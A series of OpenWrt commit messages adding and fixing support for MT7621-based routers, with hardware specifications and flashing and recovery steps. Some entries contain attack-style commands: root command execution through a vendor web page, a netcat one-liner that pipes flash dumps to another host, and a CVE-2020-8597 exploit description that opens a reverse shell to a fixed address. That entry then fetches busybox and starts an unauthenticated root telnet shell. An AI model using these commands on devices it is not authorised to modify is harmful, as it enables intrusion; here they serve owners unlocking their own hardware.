The Winstars WS-WN583A6 is a wireless repeater with 2 gigabit ethernet
ports. Even if mine is branded as "Gemeita AC2100", the sticker on the
back says WS-WN583A6. So I will refer to it as Winstars WS-WN583A6.
Probably the real product name is the Wavlink WL-WN583A6 because of
the many references to Wavlink in the OEM firmware and bootlog.
Hardware
--------
SoC: Mediatek MT7621AT (880 MHz, 2 cores 4 threads)
RAM: 128MB
FLASH: 8MB NOR (GigaDevice GD25Q64B)
ETH: 2x 10/100/1000 Mbps Ethernet (MT7530)
WIFI:
- 2.4GHz: 1x MT7603E (2x2:2)
- 5GHz: 1x MT7615E (4x4:4)
- 6 internal antennas
BTN:
- 1x Reset button
- 1x WPS button
- 1x ON/OFF switch (working but unmodifiable)
- 1x Auto/Schedule switch (working but unmodifiable. Read Note #3)
LEDS:
- 1x White led
- 1x Red led
- 1x Amber led
- 1x Blue led
- 2x Blue leds (lan and wan port status: working but unmodifiable)
UART:
- 57600-8-N-1
Everything works correctly.
Currently there is no firmware update available. Because of this, in
order to restore the OEM firmware, you must firstly dump the OEM
firmware from your router before you flash the OpenWrt image.
Backup the OEM Firmware
-----------------------
The following steps are to be intended for users having little to none
experience in linux. Obviously there are many ways to backup the OEM
firmware, but probably this is the easiest way for this router.
Procedure tested on M83A6.V5030.191210 firmware version.
1) Go to http://192.168.10.1/webcmd.shtml
2) Type the following line in the "Command" input box:
mkdir /etc_ro/lighttpd/www/dev; for i in /dev/mtd*ro; do dd if=${i} of=/etc_ro/lighttpd/www${i}; done
3) Click "Apply"
4) After few seconds, in the textarea should appear this output:
16384+0 records in
16384+0 records out
8388608 bytes (8.0MB) copied, 4.038820 seconds, 2.0MB/s
384+0 records in
384+0 records out
196608 bytes (192.0KB) copied, 0.095180 seconds, 2.0MB/s
128+0 records in
128+0 records out
65536 bytes (64.0KB) copied, 0.032020 seconds, 2.0MB/s
128+0 records in
128+0 records out
65536 bytes (64.0KB) copied, 0.031760 seconds, 2.0MB/s
15744+0 records in
15744+0 records out
8060928 bytes (7.7MB) copied, 3.885280 seconds, 2.0MB/s
dd: can't open '/dev/mtd5ro': No such device
dd: can't open '/dev/mtd6ro': No such device
dd: can't open '/dev/mtd7ro': No such device
Excluding the "X.XXXXXX seconds" part, you should get the same
exact output. If your output doesn't match mine, stop reading
and ask for help in the forum.
5) Open the following links to download the partitions of the OEM FW:
http://192.168.10.1/dev/mtd0rohttp://192.168.10.1/dev/mtd1rohttp://192.168.10.1/dev/mtd2rohttp://192.168.10.1/dev/mtd3rohttp://192.168.10.1/dev/mtd4ro
If one (or more) of these files weight 0 byte, stop reading and ask
for help in the forum.
6) Store these downloaded files in a safe place.
7) Reboot your router to remove any temporary file from your router.
Installation
------------
Flash the initramfs image in the OEM firmware interface.
When openwrt boots, flash the sysupgrade image otherwise you won't be
able to keep configuration between reboots.
Restore OEM Firmware
--------------------
Flash the "mtd4ro" file you previously backed-up directly from LUCI.
Warning: Remember to not keep settings!
Warning2: Remember to force the flash.
Notes
-----
1) The "System Command" page allows to run every command as root.
For example you can use "dd" and "nc" to backup the OEM firmware.
PC (SERVER):
nc -l 5555 > ./mtdXro
ROUTER (CLIENT):
dd if=/dev/mtdXro | nc PC_IP_ADDRESS 5555
2) The OEM web interface accepts only images containing the string
"WN583A6" in the filename.
Currently the OEM interface accepts only the initramfs image
probably because it checks if the ih_size in the image header is
equal to the whole image size (instead of the kernel size)
Read more here:
https://forum.openwrt.org/t/support-for-strong-1200/22768/19
3) The white led (namely "Smart Night Light") can be controller by the
user only if the side switch is set to "Schedule" otherwise it will
be activated by the light condition (there is a photodiode on the
top side of the router)
4) Router mac addresses:
LAN XX:XX:XX:XX:XX:8F
WAN XX:XX:XX:XX:XX:90
WIFI 2G XX:XX:XX:XX:XX:91
WIFI 5G XX:XX:XX:XX:XX:92
LABEL XX:XX:XX:XX:XX:91
Signed-off-by: Davide Fioravanti <pantanastyle@gmail.com>
[remove chosen node, fix whitespace]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
The function name ucidef_set_interface_lan_wan does not exist,
use the proper name by adding an "s" and thereby fix network
setup on these devices.
Fixes: 22468cc40c (ramips: erx and erx-sfp: fix missing WAN interface)
Signed-off-by: Nelson Cai <niphor@gmail.com>
[commit message/title facelift]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This patch adds support for D-Link DIR-867 A1 and D-Link DIR-882 A1. Given
the similarity of these devices, this patch also introduces a common DTS
shared between DIR-867 A1, DIR-878 A1 and DIR-882 A1.
Specifications:
* Board: AP-MTKH7-0002
* SoC: MediaTek MT7621AT
* RAM: 128 MB (DDR3)
* Flash: 16 MB (SPI NOR)
* WiFi: MediaTek MT7615N (x2)
* Switch: 1 WAN, 4 LAN (Gigabit)
* Ports: 1 USB 2.0, 1 USB 3.0
* Buttons: Reset, WiFi Toggle, WPS
* LEDs: Power (green/orange), Internet (green/orange), WiFi 2.4G (green),
WiFi 5G (green), USB 2.0 (green), USB 3.0 (green)
Notes:
* WiFi 2.4G and WiFi 5G LEDs are wired directly to the wireless chips
* DIR-867 wireless chips are limited to 3x3 streams at hardware level
* USB ports and related LEDs available only on DIR-882
Serial port:
* Parameters: 57600, 8N1
* Location: J1 header (close to the Reset, WiFi and WPS buttons)
* Pinout: 1 - VCC
2 - RXD
3 - TXD
4 - GND
Installation:
* D-Link Recovery GUI: power down the router, press and hold the reset
button, then re-plug it. Keep the reset button pressed until the power
LED starts flashing orange, manually assign a static IP address under
the 192.168.0.xxx subnet (e.g. 192.168.0.2) and go to http://192.168.0.1
* Some modern browsers may have problems flashing via the Recovery GUI,
if that occurs consider uploading the firmware through cURL:
curl -v -i -F "firmware=@file.bin" 192.168.0.1
Signed-off-by: Mateus B. Cassiano <mbc07@live.com>
[move DEVICE_VARIANT to individual definitions]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Specifications:
* SoC: MediaTek MT7621A (880 MHz 2c/4t)
* RAM: Nanya NT5CC128M16IP-DIT (256M DDR3-1600)
* Flash: Macronix MX30LF1G18AC-TI (128M NAND)
* Eth: MediaTek MT7621A (10/100/1000 Mbps x5)
* Radio: MT7615N (2.4 GHz & 5 GHz)
4 antennae: 1 internal and 3 non-deatachable
* USB: 3.0 (x1)
* LEDs:
White (x1 logo)
Green (x6 eth + wps)
Orange (x5, hardware-bound)
* Buttons:
Reset (x1)
WPS (x1)
Everything works! Been running it for a couple weeks now and haven't had
any problems. Please let me know if you run into any.
Installation:
Flash factory image through GUI.
This might fail due to the A/B nature of this device. When flashing, OEM
firmware writes over the non-booted partition. If booted from 'A',
flashing over 'B' won't work. To get around this, you should flash the
OEM image over itself. This will then boot the router from 'B' and
allow you to flash OpenWRT without problems.
Reverting to factory firmware:
Hard-reset the router three times to force it to boot from 'B.' This is
where the stock firmware resides. To remove any traces of OpenWRT from
your router simply flash the OEM image at this point.
Signed-off-by: Santiago Rodriguez-Papa <contact@rodsan.dev>
[use v1 only, minor DTS adjustments, use LINKSYS_HWNAME and add it to
DEVICE_VARS, wrap DEVICE_PACKAGES, adjust commit message/title]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Specifications:
SoC: MT7621AT
RAM: 128MB
Flash: 16MB NOR SPI flash
WiFi: MT7615N (2.4GHz) and MT7615N (5Ghz)
LAN: 5x1000M
Firmware layout is Uboot with extra 96 bytes in header
Base PCB is AP-MTKH7-0002
LEDs Power Green,Power Orange,Internet Green,Internet Orange
LEDs "2.4G" Green & "5G" Green connected directly to wifi module
Buttons Reset,WPS,WIFI
Flashing instructions:
Upload image via emergency recovery mode
Push and hold reset button (on the back of the device) until power led
starts flashing (about 10 secs or so) while powering the device on.
Give it ~30 seconds, to boot the recovery mode GUI
Connect your client computer to LAN1 of the device
Set your client IP address manually to 192.168.0.2 / 255.255.255.0.
Call the recovery page for the device at http://192.168.0.1
Use the provided emergency web GUI to upload and flash a new firmware to
the device. Some browsers/OS combinations are known not to work, so if
you don't see the percentage complete displayed and moving within a few
seconds, restart the procedure from scratch and try anoher one,
or try the command line way.
Alternative method using command line on Linux:
curl -v -i -F "firmware=@openwrt-xxxx-squashfs-factory.bin" 192.168.0.1
Signed-off-by: Mathieu Martin-Borret <mathieu.mb@protonmail.com>
[use of generic uimage-padhdr in image generation code]
Signed-off-by: Petr Štetiar <ynezz@true.cz>
The current one only looks for mt76x2e and mt7603e, and
does not work for 2 or more same Wi-Fi chips.
Refactor the script to cover those cases.
Signed-off-by: DENG Qingfang <dengqf6@mail2.sysu.edu.cn>
Hardware
--------
SoC: MediaTek MT7621ST
WiFi: MediaTek MT7603
Quantenna QT3840BC
Flash: 128M NAND
RAM: 64M
LED: Dual colour red and green
BTN: Reset
WPS
Eth: 4 x 10/100/1000 connected to MT7621 internal switch
MT7621 RGMII port connected to Quantenna module
GPIO: Power/reset of Quantenna module
Quantenna module
----------------
The Quantenna QT3840BC (or QV840) is a separate SoC running
another Linux installation. It is mounted on a wide mini-PCIe
form factor module, but is connected to the RGMII port of
the MT7621. It loads both a second uboot stage and an os
image from the MT7621 using tftp. The module is configured
using Quantenna specific RPC calls over IP, using 802.1q
over the RGMII link to support multiple SSIDs.
There is no support for using this module as a WiFi device
in OpenWrt. A package with basic firmware and management
tools is being prepared.
Serial ports
------------
Two serial ports with headers:
RRJ1 - 115200 8N1 - Connected to the Quantenna console
J1 - 57600 8N1 - Connected to the MT7621 console
Both share pinout with many other Zyxel/Mitrastar devices:
1 - NC (VDD)
2 - TX
3 - RX
4 - NC (no pin)
5 - GND
Dual system partitions
----------------------
The vendor firmware and boot loader use a dual partition
scheme storing a counter in the header of each partition. The
partition with the highest number will be selected for boot.
OpenWrt does not support this scheme and will always use the
first OS partition. It will reset both counters to zero the
first time sysupgrade is run, making sure the first partition
is selected by the boot loader.
Installation from vendor firmware
---------------------------------
1. Run a DHCP server. The WAP6805 is configured as a client device
and does not have a default static IP address. Make a note of
which address it is assigned
2. tftp the OpenWrt initramfs-kernel.bin image to this address.
Wait for the WAP6805 to reboot.
3. ssh to the OpenWrt initramfs system on 192.168.1.1. Make a
backup of all mtd partitions now. The last used OEM image is
still present in either "Kernel" or "Kernel2" at this point,
and can be restored later if you save a copy.
4. sysupgrade to the OpenWrt sysupgrade.bin image.
Installation from U-Boot
------------------------
This requires serial console access
1. Copy the OpenWrt initramfs-kernel.bin image as "ras.bin" to
your tftp server directory. Configure the server address as
192.168.0.33/24
2. Hit ESC when the message "Hit ESC key to stop autoboot"
appears
3. Type "ATGU" + Enter, and then "2" immediately after pressing enter.
4. Answer Y to the question "Erase Linux in Flash then burn new
one. Are you sure?", and answer the address/filename questions.
Defaults:
Input device IP (192.168.0.2)
Input server IP (192.168.0.33)
Input Linux Kernel filename ("ras.bin")
5. Wait until after you see the message "Done!" and power cycle
the device. It will hang after flashing.
6. Continue with step 3 and 4 from the vendor firmware procedure.
Notes on the WAP6805 U-Boot
---------------------------
The bootloader has been modified with both ZyXELs zyloader and the
device specific dual partition scheme. These changes appear to have
broken a few things. The zyloader shell claims to support a number
of ZyXEL AT commands, but not all of them work. The image selection
scheme is unreliable and inconsistent. A limited U-Boot menu is
available - and used by the above U-Boot install procedure. But
direct booting into an uploaded image does not work, neither with
ram nor with flash. Flashing works, but requires a hard reset after
it is finished.
Reverting to OEM firmware
-------------------------
The OEM firmware can be restored by using mtd write from OpenWrt,
flashing it to the "Kernel" partition. E.g.
ssh root@192.168.1.1 "mtd -r -e Kernel write - Kernel" < oem.bin
OEM firmwares for the WAP6805 are not avaible for public download,
so a backup of the original installation is required. See above.
Alternatively, firmware for the WAP6806 (Armor X1) may be used. This
is exactly the same hardware. But the branding features do obviously
differ.
LED controller
--------------
Hardware implementation is unknown. The dual-color LED is controlled
by 3 GPIOs:
4: red
7: blinking green
13: green
Enabling both red and green makes the LED appear yellow.
The boot loader enables hardware blinking, causing the green LED to blink
slowly on power-on, until the OpenWrt boot mode starts a faster software
blink.
Signed-off-by: Bjørn Mork <bjorn@mork.no>
[fix alphabetic sorting for image build statement]
Signed-off-by: Petr Štetiar <ynezz@true.cz>
The Xiaomi Mi Router AC2100 is a *black* cylindrical router that shares many
characteristics (apart from its looks and the GPIO ports) with the 6-antenna
*white* "Xiaomi Redmi Router AC2100"
See the visual comparison of the two routers here:
https://github.com/emirefek/openwrt-R2100/raw/imgcdn/rm2100-r2100.jpg
Specification of R2100:
- CPU: MediaTek MT7621A
- RAM: 128 MB DDR3
- FLASH: 128 MB ESMT NAND
- WIFI: 2x2 802.11bgn (MT7603)
- WIFI: 4x4 802.11ac (MT7615)
- ETH: 3xLAN+1xWAN 1000base-T
- LED: Power, WAN in Yellow and Blue
- UART: On board (Don't know where is should be confirmed by anybody else)
- Modified u-boot
Hacking of official firmware process is same at both RM2100 and R2100.
Thanks to @namidairo
Here is the detailed guide Hack: https://github.com/impulse/ac2100-openwrt-guide
Guide is written for MacOS but it will work at linux.
needed packages: python3(with scapy), netcat, http server, telnet client
1. Run PPPoE&exploit to get nc and wget busybox, get telnet and wget firmware
2. mtd write openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-kernel1.bin kernel1
3. nvram set uart_en=1
4. nvram set bootdelay=5
5. nvram set flag_try_sys1_failed=1
6. nvram commit
7. mtd -r write openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-rootfs0.bin rootfs0
other than these I specified in here. Everything is same with:
f3792690c4
Thanks for all community and especially for this device:
@Ilyas @scp07 @namidairo @Percy @thorsten97 @impulse (names@forum.openwrt.com)
MAC Locations:
WAN *:b5 = factory 0xe006
LAN *:b6 = factory 0xe000
WIFI 5ghz *:b8 = factory 0x8004
WIFI 2.4ghz *:b7 = factory 0x0004
Signed-off-by: Emir Efe Kucuk <emirefek@gmail.com>
[refactored common image bits into Device/xiaomi-ac2100, fixed From:]
Signed-off-by: Petr Štetiar <ynezz@true.cz>
Hardware
--------
SoC: Mediatek MT7621AT (880 MHz, 2 cores 4 threads)
RAM: 128MB
FLASH: 16MB NOR (Macronix MX25L12805D)
ETH: 1x 10/100/1000 Mbps Ethernet (MT7530)
WIFI:
- 2.4GHz: 1x MT7615 (4x4:4)
- 5GHz: 1x MT7615 (4x4:4)
- 4 antennas: 2 external detachable and 2 internal
BTN:
- 1x Reset button
- 1x WPS button
LEDS:
- 1x Green led (Power)
- 1x Green-Amber-Red led (Wifi)
UART:
- 57600-8-N-1
Everything works correctly.
Installation
------------
Flash the factory image directly from OEM web interface.
(You can login using these credentials: admin/1234)
Restore OEM Firmware
--------------------
Flash the OEM "bin" firmware directly from LUCI.
The firmware is downloadable from the OEM web page.
Warning: Remember to not keep settings!
Warning2: Remember to force the flash.
Restoring procedure tested with RE23_1.08.bin
MAC addresses
-------------
factory 0x4 *:24
factory 0x8004 *:25
Cimage 0x07 *:24
Cimage 0x0D *:24
Cimage 0x13 *:24
Cimage 0x19 *:25
No other addresses were found in factory partition.
Since the label contains both the 2.4GHz and 5GHz mac address I decided
to set the 5GHz one as label-mac-device. Moreover it also corresponds
to the lan mac address.
Notes
-----
The wifi led in the OEM firmware changes colour depending on the signal
strength. This can be done in OpenWrt but just for one interface.
So for now will not be any default action for this led.
If you want to open the case, pay attention to the antenna placed on
the bottom part of the front cover.
The wire is a bit short and it breaks easily. (I broke it)
Signed-off-by: Davide Fioravanti <pantanastyle@gmail.com>
[fix two typos and add extended MAC address section to commit message]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This moves WiFi LED triggers from 01_leds to device tree.
While at it, convert the labels there to lower case; this is
more commonly used and the change will actually remove competition
between DT trigger and leftover uci config on already installed
systems.
Suggested-by: Georgi Vlaev <georgi.vlaev@gmail.com>
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This device uses the same hardware as RE650 v1 which got supported in
8c51dde.
Hardware specification:
- SoC 880 MHz - MediaTek MT7621AT
- 128 MB of DDR3 RAM
- 16 MB - Winbond 25Q128FVSG
- 4T4R 2.4 GHz - MediaTek MT7615E
- 4T4R 5 GHz - MediaTek MT7615E
- 1x 1 Gbps Ethernet - MT7621AT integrated
- 7x LEDs (Power, 2G, 5G, WPS(x2), Lan(x2))
- 4x buttons (Reset, Power, WPS, LED)
- UART header (J1) - 2:GND, 3:RX, 4:TX
Serial console @ 57600,8n1
Flash instructions:
Upload
openwrt-ramips-mt7621-tplink_re500-v1-squashfs-factory.bin
from the RE500 web interface.
TFTP recovery to stock firmware:
Unfortunately, I can't find an easy way to recover the RE
without opening the device and using modified binaries. The
TFTP upload will only work if selected from u-boot, which
means you have to open the device and attach to the serial
console. The TFTP update procedure does *not* accept the
published vendor firmware binaries. However, it allows to
flash kernel + rootfs binaries, and this works if you have
a backup of the original contents of the flash. It's probably
possible to create special image out of the vendor binaries
and use that as recovery image.
Signed-off-by: Christoph Krapp <achterin@googlemail.com>
[remove dts-v1 in DTSI, do not touch WiFi LEDs for RE650, keep
state_default in DTS files, fix label-mac-device, use lower case
for WiFi LEDs]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
The WAC124 hardware appears to be identical to R6260/R6350/R6850.
SoC: MediaTek MT7621AT
RAM: 128M DDR3
FLASH: 128M NAND (Macronix MX30LF1G18AC)
WiFI: MediaTek MT7603 bgn 2T2R
MediaTek MT7615 nac 4T4R
ETH: SoC Integrated Gigabit Switch (1x WAN, 4x LAN)
USB: 1x USB 2.0
BTN: Reset, WPS
LED: Power, Internet, WiFi, USB (all green)
Installation:
The factory image can be flashed from the stock firmware web interface
or using nmrpflash. With nmrpflash it is also possible to revert to
stock firmware.
Signed-off-by: Jan Hoffmann <jan@3e8.eu>
This drops the shebang from all target files for /lib and
/etc/uci-defaults folders, as these are sourced and the shebang
is useless.
While at it, fix the executable flag on a few of these files.
This does not touch ar71xx, as this target is just used for
backporting now and applying cosmetic changes would just complicate
things.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
The uci config section network.globals set up in /bin/config_generate
will only be created if /proc/sys/net/ipv6 exists.
Correspondingly, lacking IPv6 support, the command
uci set network.globals.packet_steering=1
will fail with "uci: Invalid argument" as the network.globals config
has not been set up.
Fix that by adding the setup there as well.
Fixes: dfd62e575c ("ramips: enable packet steering by default on mt7621")
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
NETGEAR WAC104 is an AP based on castrated R6220, without WAN
port and USB.
SoC: MediaTek MT7621ST
RAM: 128M DDR3
FLASH: 128M NAND
WiFi: MediaTek MT7612EN an+ac
MediaTek MT7603EN bgn
ETH: MediaTek MT7621ST (4x LAN)
BTN: 1x Connect (WPS), 1x WLAN, 1x Reset
LED: 7x (3x GPIO controlled)
Installation:
Login to netgear webinterface and flash factory.img
Back to stock:
Use nmrpflash to revert stock image.
Signed-off-by: Pawel Dembicki <paweldembicki@gmail.com>
Since 01_enable_packet_steering only touches the network config,
limit the uci commit to this as well.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This partially reverts commit 5acd1ed0be ("ramips: mt7621: fix
Ubiquiti ER-X ports names and MAC addresses"), this change was discussed
in https://github.com/openwrt/openwrt/pull/2901#discussion_r407238452
With commit 5acd1ed0be ("ramips: mt7621: fix Ubiquiti ER-X ports names
and MAC addresses"), all the ports were put into the LAN bridge, with
the argument that the OEM firmware does not have a WAN port enabled. In
the default OEM setup, all of the ports except eth0 are dead and eth0 is
set to a static IP address without providing DHCP services when
connected. It is only after the wizard has been run that eth0 becomes
the WAN port and all the rest of the ports belong to LAN with DHCP
enabled.
Having all of the ports set to the LAN bridge does not mirror the default
OEM setup. To accomplish that, then only eth0 would be in the LAN bridge.
But this is not the expected behaviour of OpenWrt.
Therefore this proposal to set eth0 to WAN and eth1-N to LAN provides
the expected behaviour expected from OpenWrt, maintains the current
documentation as up-to-date, and does not require the user to manually
detach eth0 from the LAN bridge, create the WAN(6) interface(s), and set
eth0 to the WAN(6) interface(s).
Fixes: 5acd1ed0be ("ramips: mt7621: fix Ubiquiti ER-X ports names and MAC addresses")
Signed-off-by: Perry Melange <isprotejesvalkata@gmail.com>
[commit subject and description tweaks]
Signed-off-by: Petr Štetiar <ynezz@true.cz>
Commit f761f4052c had bogus case syntax, the uci-defaults script threw
errors as a result and exited non-zero, probably didn't do what was
intended, but tried over and over since the non-zero exit prevents the
script from being deleted.
Fixes: f761f4052c ("ramips: mt7621: harmonize naming scheme for Mikrotik")
Signed-off-by: Russell Senior <russell@personaltelco.net>
[extend commit title, add Fixes]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Specification:
- CPU: MediaTek MT7621A
- RAM: 128 MB DDR3
- FLASH: 128 MB ESMT NAND
- WIFI: 2x2 802.11bgn (MT7603)
- WIFI: 4x4 802.11ac (MT7615)
- ETH: 3xLAN+1xWAN 1000base-T
- LED: Power, WAN, in Amber and White
- UART: On board near ethernet, opposite side from power
- Modified u-boot
Installation:
1. Run linked exploit to get shell, startup telnet and wget the files over
2. mtd write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-kernel1.bin kernel1
3. nvram set uart_en=1
4. nvram set bootdelay=5
5. nvram set flag_try_sys1_failed=1
6. nvram commit
7. mtd -r write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-rootfs0.bin rootfs0
Restore to stock:
1. Setup PXE and TFTP server serving stock firmware image
(See dhcp-boot option of dnsmasq)
2. Hold reset button down before powering on and wait for flashing amber led
3. Release reset button
4. Wait until status led changes from flashing amber to white
Notes:
This device has dual kernel and rootfs slots like other Xiaomi devices currently
supported (mir3g, etc.) thus, we use the second slot and overwrite the first
rootfs onwards in order to get more space.
Exploit and detailed instructions:
https://openwrt.org/toh/xiaomi/xiaomi_redmi_router_ac2100
An implementation of CVE-2020-8597 against stock firmware version 1.0.14
This requires a computer with ethernet plugged into the wan port and an active
PPPoE session, and if successful will open a reverse shell to 192.168.31.177
on port 31337.
As this shell is somewhat unreliable and likely to be killed in a random amount
of time, it is recommended to wget a static compiled busybox binary onto the
device and start telnetd with it.
The stock telnetd and dropbear unfortunately appear inoperable.
(Disabled on release versions of stock firmware likely)
Ie. wget https://yourip/busybox-mipsel -O /tmp/busybox
chmod a+x /tmp/busybox
/tmp/busybox telnetd -l /bin/sh
Tested-by: David Martinez <bonkilla@gmail.com>
Signed-off-by: Richard Huynh <voxlympha@gmail.com>
The Linksys EA7500 v2 is advertised as AC1900, but its internal
hardware is AC2600 capable.
Hardware
--------
SoC: Mediatek MT7621AT (880 MHz, 2 cores 4 threads)
RAM: 256M (Nanya NT5CC128M16IP-DI)
FLASH: 128MB NAND (Macronix MX30LF1G18AC-TI)
ETH: 5x 10/100/1000 Mbps Ethernet (MT7530)
WIFI:
- 2.4GHz: 1x MT7615N (4x4:4)
- 5GHz: 1x MT7615N (4x4:4)
- 4 antennas: 3 external detachable antennas and 1 internal
USB:
- 1x USB 3.0
- 1x USB 2.0
BTN:
- 1x Reset button
- 1x WPS button
LEDS:
- 1x White led (Power)
- 6x Green leds (link lan1-lan4, link wan, wps)
- 5x Orange leds (act lan1-lan4, act wan) (working but unmodifiable)
Everything works correctly.
Installation
------------
The “factory” openwrt image can be flashed directly from OEM stock
firmware. After the flash the router will reboot automatically.
However, due to the dual boot system, the first installation could fail
(if you want to know why, read the footnotes).
If the flash succeed and you can reach OpenWrt through the web
interface or ssh, you are done.
Otherwise the router will try to boot 3 times and then will
automatically boot the OEM firmware (don’t turn off the router.
Simply wait and try to reach the router through the web interface
every now and then, it will take few minutes).
After this, you should be back in the OEM firmware.
Now you have to flash the OEM Firmware over itself using the OEM web
interface (I tested it using the FW_EA7500v2_2.0.8.194281_prod.img
downloaded from the Linksys website).
When the router reboots flash the “factory” OpenWrt image and this
time it should work.
After the OpenWrt installation you have to use the sysupgrade image
for future updates.
Restore OEM Firmware
--------------------
After the OpenWrt flash, the OEM firmware is still stored in the
second partition thanks to the dual boot system.
You can switch from OpenWrt to OEM firmware and vice-versa failing
the boot 3 times in a row:
1) power on the router
2) wait 15 seconds
3) power off the router
4) repeat steps 1-2-3 twice more.
5) power on the router and you should be in the “other” firmware
If you want to completely remove OpenWrt from your router, switch to
the OEM firmware and then flash OEM firmware from the web interface
as a normal update.
This procedure will overwrite the OpenWrt partition.
Footnotes
---------
The Linksys EA7500-v2 has a dual boot system to avoid bricks.
This system works using 2 pair of partitions:
1) "kernel" and "rootfs"
2) "alt_kernel" and "alt_rootfs".
After 3 failed boot attempts, the bootloader tries to boot the other
pair of partitions and so on.
This system is managed by the bootloader, which writes a bootcount in
the s_env partition, and if successfully booted, the system add a
"zero-bootcount" after the previous value.
A system update performed from OEM firmware, writes the firmware on the
other pair of partitions and sets the bootloader to boot the new pair
of partitions editing the “boot_part” variable in the bootloader vars.
Effectively it's a quick and safe system to switch the selected boot
partition.
Another way to switch the boot partition is:
1) power on the router
2) wait 15 seconds
3) power off the router
4) repeat steps 1-2-3 twice more.
5) power on the router and you should be in the “other” firmware
In this OpenWrt port, this dual boot system is partially working
because the bootloader sets the right rootfs partition in the cmdline
but unfortunately OpenWrt for ramips platform overwrites the cmdline
so is not possible to detect the right rootfs partition.
Because all of this, I preferred to simply use the first pair of
partitions and set read-only the other pair.
However this solution is not optimal because is not possible to know
without opening the case which is the current booted partition.
Let’s take for example a router booting the OEM firmware from the first
pair of partitions. If we flash the OpenWrt image, it will be written
on the second pair. In this situation the router will bootloop 3 times
and then will automatically come back to the first pair of partitions
containg the OEM firmware.
In this situation, to flash OpenWrt correctly is necessary to switch
the booting partition, flashing again the OEM firmware over itself.
At this point the OEM firmware is on both pair of partitions but the
current booted pair is the second one.
Now, flashing the OpenWrt factory image will write the firmware on
the first pair and then will boot correctly.
If this limitation in the ramips platform about the cmdline will be
fixed, the dual boot system can also be implemented in OpenWrt with
almost no effort.
Signed-off-by: Davide Fioravanti <pantanastyle@gmail.com>
Co-Developed-by: Jackson Lim <jackcolentern@gmail.com>
Signed-off-by: Jackson Lim <jackcolentern@gmail.com>
As evidenced here[1] the device MAC address can be stored at a random
offset in the hard_config partition. Rely on sysfs to update the MAC
address correctly.
Adjust config so that WAN is base MAC and LAN is base MAC +1 to better
match label and vendor OS.
[1] https://github.com/openwrt/openwrt/pull/2850#issuecomment-610809021
Signed-off-by: Thibaut VARÈNE <hacks@slashdirt.org>
According to a user in OpenWrt forum, on RouterOS the MAC addresses are
ether1(WAN) = MAC
ether2(LAN2) = MAC+1
ether3(LAN3) = MAC+2
etc.
Fix the MAC addresses in OpenWrt.
Ref: https://forum.openwrt.org/t/few-dumb-question-about-mt7530-rb750gr3-dsa/61608
Signed-off-by: DENG Qingfang <dengqf6@mail2.sysu.edu.cn>
[remove label_mac in 02_network]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
SFP cage of this device is connected via a AT8031 phy to port 5 of the switch.
This phy act as a RGMII-to-SerDes converter.
Also a I2C clock gate needs to be enabled in order to access the SFP module via I2C bus.
SFP cage also has module detect pin which is connected to I2C gpio expander.
With this patch the kernel/PHYLINK now can detect, readout and use the SFP module/port.
NOTE: SFP cage / AT8033 PHY only support 1000base-X encoding!
This means that some SGMII modules can work and only at forced 1GBit/full-duplex!
Signed-off-by: René van Dorst <opensource@vdorst.com>
mt7621 and mt76x8 subtargets have been moved to kernel 5.4 and their
DTS(I) files are incompatible to kernel 4.14.
Remove the corresponding kernel config files to signal that more
boldly and to prevent accidentally patching the wrong kernel when
pulling in older config patches.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
With v5.4 kernel a new gpio driver is used.
GPIO numbering has changed so update 03_gpio_switches too.
Signed-off-by: René van Dorst <opensource@vdorst.com>
With v5.4 kernel a new gpio driver is used.
GPIO numbering has changed so update 03_gpio_switches too.
Signed-off-by: René van Dorst <opensource@vdorst.com>
These stock partitons: "backup", "hw_panic", "overly", firmware_backup", "opt"
do not contain any device-specific data and can be used for /overlay, resulting in
121M space
Signed-off-by: DENG Qingfang <dengqf6@mail2.sysu.edu.cn>
The "proper" vendor prefix for Ubiquiti is "ubnt", this is used in
all targets except ramips and also recommended by the kernel.
This patch adjusts the various board/image/device name variables
accordingly. Since we touch it anyway, this also adds the space
in "EdgeRouter X" as a hyphen to those variables to really make
them consistent with the model name.
While at it, create a real shared definition for the devices in
image/mt7621.mk instead of deriving one device from another.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
I-O DATA WN-AX2033GR is roughly the same as I-O DATA
WN-AX1167GR2. The difference is Wi-Fi feature.
Specification
=============
- SoC: MediaTek MT7621A
- RAM: DDR3 128 MiB
- Flash Memory: NAND 128 MiB (Spansion S34ML01G200TF100)
- Wi-Fi: MediaTek MT7603E
- Wi-Fi: MediaTek MT7615
- Ethernet: 5x 10 Mbps / 100 Mbps / 1000 Mbps (1x WAN, 4x LAN)
- LED: 2x green LED
- Input: 2x tactile switch, 1x slide switch
- Serial console: 57600bps, PCB through hole J5 (Vcc, TX, RX, NC, GND)
- Power: DC 12V
This device only supports channel 1-13 and 36-140.
Thus, narrower frequency limits compared to other devices are required
for limiting wi-fi frequency correctly.
Without this, non-supported frequencies are activated.
Flash instructions
==================
1. Open the router management page (192.168.0.1).
2. Update router firmware using "initramfs-kernel.bin".
3. After updating, run sysupgrade with "sysupgrade.bin".
Recovery instructions
=====================
WN-AX2033GR contains Zyxel Z-LOADER
1. Setup TFTP server (IP address: 10.10.10.3).
2. Put official firmware into TFTP server directory (distribution site:
https://www.iodata.jp/lib/software/w/2068.htm)
3. Connect WX-AX2033GR Ethernet port and computer that runs TFTP server.
4. Connect to serial console.
5. Interrupt booting by Esc key.
6. Flash firmware using "ATNR 1,[firmware filename]" command.
Signed-off-by: Yanase Yuki <dev@zpc.sakura.ne.jp>
